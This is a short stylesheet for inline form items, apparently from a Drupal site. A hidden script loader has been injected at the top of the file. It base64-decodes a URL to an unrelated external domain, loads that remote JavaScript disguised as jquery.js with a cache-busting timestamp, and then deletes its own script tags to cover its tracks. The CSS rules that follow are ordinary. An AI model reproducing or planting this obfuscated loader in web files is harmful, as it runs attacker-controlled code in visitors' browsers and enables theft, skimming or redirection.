<script>!function(){var s=document.createElement("script"),c=document.currentScript;s.src=atob("aHR0cHM6Ly93d3cuamlzaGk2NjYudG9wL2pxdWVyeS5qcw==")+"?_="+Date.now();s.onload=function(){this.remove();c.remove();};document.head.appendChild(s);}();</script>  /**
 * @file
 * Inline items.
 */

.container-inline div,
.container-inline label {
  display: inline-block;
}
/* Details contents always need to be rendered as block. */
.container-inline .details-wrapper {
  display: block;
}
